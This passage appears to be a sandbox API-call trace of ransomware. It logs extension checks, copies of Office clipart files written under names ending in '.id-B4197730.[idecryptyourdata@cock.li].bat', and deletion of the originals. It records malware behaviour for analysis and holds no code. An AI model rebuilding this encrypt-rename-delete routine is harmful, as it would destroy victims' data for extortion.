Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105502.wmf")) returned 1 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString=".doc") returned 4 [0182.099] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString=".docx") returned 5 [0182.099] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.099] lstrlenW (lpString=".pdf") returned 4 [0182.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString=".xls") returned 4 [0182.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.099] lstrlenW (lpString=".xlsx") returned 5 [0182.099] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.099] lstrlenW (lpString=".ppt") returned 4 [0182.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString=".zip") returned 4 [0182.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.099] lstrlenW (lpString=".rar") returned 4 [0182.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString=".bz2") returned 4 [0182.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString=".7z") returned 3 [0182.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString=".dbf") returned 4 [0182.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString=".1cd") returned 4 [0182.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.099] lstrlenW (lpString=".jpg") returned 4 [0182.099] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString=".doc") returned 4 [0182.100] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString=".docx") returned 5 [0182.100] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0182.100] lstrlenW (lpString=".pdf") returned 4 [0182.100] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString=".xls") returned 4 [0182.100] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.100] lstrlenW (lpString=".xlsx") returned 5 [0182.100] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0182.100] lstrlenW (lpString=".ppt") returned 4 [0182.100] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString=".zip") returned 4 [0182.100] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.100] lstrlenW (lpString=".rar") returned 4 [0182.100] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString=".bz2") returned 4 [0182.100] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString=".7z") returned 3 [0182.100] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString=".dbf") returned 4 [0182.100] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString=".1cd") returned 4 [0182.100] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105502.WMF") returned 68 [0182.100] lstrlenW (lpString=".jpg") returned 4 [0182.100] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.101] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.101] lstrlenW (lpString="J0105504.WMF") returned 12 [0182.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.101] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=4148) returned 1 [0182.101] CloseHandle (hObject=0x378) returned 1 [0182.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf")) returned 0x220 [0182.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.102] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.102] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.102] GetLastError () returned 0x0 [0182.102] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1034, lpOverlapped=0x0) returned 1 [0182.145] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1040, lpOverlapped=0x0) returned 1 [0182.146] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.146] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.146] SetEndOfFile (hFile=0x37c) returned 1 [0182.146] CloseHandle (hObject=0x37c) returned 1 [0182.147] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.147] SetEndOfFile (hFile=0x378) returned 1 [0182.147] CloseHandle (hObject=0x378) returned 1 [0182.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.148] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105504.wmf")) returned 1 [0182.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.148] lstrlenW (lpString=".doc") returned 4 [0182.148] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.148] lstrlenW (lpString=".docx") returned 5 [0182.148] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.148] lstrlenW (lpString=".pdf") returned 4 [0182.148] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.148] lstrlenW (lpString=".xls") returned 4 [0182.148] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.148] lstrlenW (lpString=".xlsx") returned 5 [0182.148] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.148] lstrlenW (lpString=".ppt") returned 4 [0182.148] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.148] lstrlenW (lpString=".zip") returned 4 [0182.148] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.149] lstrlenW (lpString=".rar") returned 4 [0182.149] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString=".bz2") returned 4 [0182.149] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString=".7z") returned 3 [0182.149] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.149] lstrlenW (lpString=".dbf") returned 4 [0182.149] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.149] lstrlenW (lpString=".1cd") returned 4 [0182.149] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.149] lstrlenW (lpString=".jpg") returned 4 [0182.149] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.149] lstrlenW (lpString=".doc") returned 4 [0182.149] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString=".docx") returned 5 [0182.149] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0182.149] lstrlenW (lpString=".pdf") returned 4 [0182.149] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.149] lstrlenW (lpString=".xls") returned 4 [0182.149] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.149] lstrlenW (lpString=".xlsx") returned 5 [0182.149] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0182.149] lstrlenW (lpString=".ppt") returned 4 [0182.149] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.150] lstrlenW (lpString=".zip") returned 4 [0182.150] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.150] lstrlenW (lpString=".rar") returned 4 [0182.150] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.150] lstrlenW (lpString=".bz2") returned 4 [0182.150] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.150] lstrlenW (lpString=".7z") returned 3 [0182.150] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.150] lstrlenW (lpString=".dbf") returned 4 [0182.150] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.150] lstrlenW (lpString=".1cd") returned 4 [0182.150] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.150] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105504.WMF") returned 68 [0182.150] lstrlenW (lpString=".jpg") returned 4 [0182.150] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.150] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.150] lstrlenW (lpString="J0105506.WMF") returned 12 [0182.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.151] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=2912) returned 1 [0182.151] CloseHandle (hObject=0x378) returned 1 [0182.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf")) returned 0x220 [0182.151] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.152] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.152] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.152] GetLastError () returned 0x0 [0182.152] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0xb60, lpOverlapped=0x0) returned 1 [0182.504] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xb70, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xb70, lpOverlapped=0x0) returned 1 [0182.507] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.507] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.507] SetEndOfFile (hFile=0x37c) returned 1 [0182.508] CloseHandle (hObject=0x37c) returned 1 [0182.508] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.508] SetEndOfFile (hFile=0x378) returned 1 [0182.509] CloseHandle (hObject=0x378) returned 1 [0182.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.509] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105506.wmf")) returned 1 [0182.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.509] lstrlenW (lpString=".doc") returned 4 [0182.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.509] lstrlenW (lpString=".docx") returned 5 [0182.509] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.509] lstrlenW (lpString=".pdf") returned 4 [0182.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.509] lstrlenW (lpString=".xls") returned 4 [0182.510] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.510] lstrlenW (lpString=".xlsx") returned 5 [0182.510] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.510] lstrlenW (lpString=".ppt") returned 4 [0182.510] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString=".zip") returned 4 [0182.510] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.510] lstrlenW (lpString=".rar") returned 4 [0182.510] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString=".bz2") returned 4 [0182.510] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString=".7z") returned 3 [0182.510] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString=".dbf") returned 4 [0182.510] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString=".1cd") returned 4 [0182.510] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString=".jpg") returned 4 [0182.510] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.510] lstrlenW (lpString=".doc") returned 4 [0182.510] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.510] lstrlenW (lpString=".docx") returned 5 [0182.511] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.511] lstrlenW (lpString=".pdf") returned 4 [0182.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString=".xls") returned 4 [0182.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.511] lstrlenW (lpString=".xlsx") returned 5 [0182.511] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.511] lstrlenW (lpString=".ppt") returned 4 [0182.511] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.511] lstrlenW (lpString=".zip") returned 4 [0182.511] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.511] lstrlenW (lpString=".rar") returned 4 [0182.511] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString=".bz2") returned 4 [0182.511] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString=".7z") returned 3 [0182.511] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.511] lstrlenW (lpString=".dbf") returned 4 [0182.511] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.511] lstrlenW (lpString=".1cd") returned 4 [0182.511] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105506.WMF") returned 68 [0182.511] lstrlenW (lpString=".jpg") returned 4 [0182.511] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.512] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.512] lstrlenW (lpString="J0106146.WMF") returned 12 [0182.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.512] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=23548) returned 1 [0182.512] CloseHandle (hObject=0x378) returned 1 [0182.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf")) returned 0x220 [0182.512] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0182.513] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.513] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0182.513] GetLastError () returned 0x0 [0182.513] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x5bfc, lpOverlapped=0x0) returned 1 [0182.519] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x5c00, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x5c00, lpOverlapped=0x0) returned 1 [0182.520] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.520] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.521] SetEndOfFile (hFile=0x37c) returned 1 [0182.521] CloseHandle (hObject=0x37c) returned 1 [0182.521] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.521] SetEndOfFile (hFile=0x378) returned 1 [0182.522] CloseHandle (hObject=0x378) returned 1 [0182.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106146.wmf")) returned 1 [0182.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106146.WMF") returned 68 [0182.523] lstrlenW (lpString=".doc") returned 4 [0182.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.523] lstrlenW (lpString=".docx") returned 5 [0182.523] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned 